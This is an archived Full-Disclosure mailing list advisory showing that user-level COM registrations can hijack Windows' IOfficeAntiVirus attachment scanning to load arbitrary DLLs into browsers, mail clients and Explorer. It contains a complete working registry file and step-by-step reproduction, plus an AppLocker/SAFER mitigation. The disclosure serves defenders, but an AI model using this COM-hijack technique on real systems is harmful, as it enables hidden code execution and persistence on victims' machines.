lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 28 Mar 2020 01:07:04 +0100 From: "Stefan Kanthak" <stefan.kanthak@...go.de> To: <fulldisclosure@...lists.org> Cc: bugtraq@...urityfocus.com Subject: [FD] Defense in depth -- the Microsoft way (part 66): attachment manager allows to load arbitrary DLLs Hi @ll, this is the continuation of the previous posts <https://seclists.org/fulldisclosure/2020/Mar/45> and <https://seclists.org/fulldisclosure/2020/Mar/48>. (Un)fortunately the IOfficeAntiVirus interface (see <https://support.microsoft.com/en-us/help/914922/microsoft-windows-defender-helps-provide-real-time-protection>) has at least another weakness which also allows (unprivileged users) to load arbitrary DLLs into web browsers, mail/news clients, instant messengers, file explorer and every other program which calls this COM interface. With Windows 2000, Microsoft introduced the "merged view" of the [HKEY_CLASSES_ROOT] virtual registry tree: see <https://msdn.microsoft.com/en-us/library/ms724498.aspx> "Thanks" to this feature, COM categories/classes/interfaces registered by (unprivileged) users below [HKEY_CURRENT_USER\Software\Classes] obscure the corresponding COM categories/classes/interfaces registered (by administrators) below [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] Demonstration: ~~~~~~~~~~~~~~ On a 32-bit installation of Windows XP SP2 or any newer version of Windows perform the following steps (adaption for 64-bit installations is left as an exercise to the reader): 1. Log on to an arbitrary (unprivileged) user account. 2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL> and save it in an arbitrary directory. 3. Create a text file SENTINEL.REG with the following contents: --- SENTINEL.REG --- REGEDIT4 [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}] @="Vulnerability and Exploit Detector" [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}] @="MSOfficeAntiVirus" [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32] @="<path>\\SENTINEL.DLL" ; replace <path> with the directory used in step 2. "ThreadingModel"="Both" ; NOTE: the following entries are optional! [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\TreatAs] @="{56FFCC31-D398-11D0-B2AE-00A0C908FA49}" [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}] @="IOfficeAntiVirus" [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}] @="IOfficeAntiVirus" [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface] @="{00000000-0000-0000-C000-000000000046}" ; IUnknown [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods] @="4" --- EOF --- 4. Double-click the file SENTINEL.REG to merge it into the user's registry. 5. Download an arbitrary file with your web browser, for example <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>, or save an attachment in your mail client, and notice the message boxes displayed from the sentinels. NOTE: the batch script <https://skanthak.homepage.t-online.de/download/MSOAV.CMD> performs all these steps on 32-bit and 64-bit installations of Windows XP and newer versions of Windows. Mitigation: ~~~~~~~~~~~ Use AppLocker or SAFER alias Software Restriction Policies: see <https://skanthak.homepage.t-online.de/SAFER.html> stay tuned, and NEVER use Windows without SAFER or AppLocker Stefan Kanthak _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists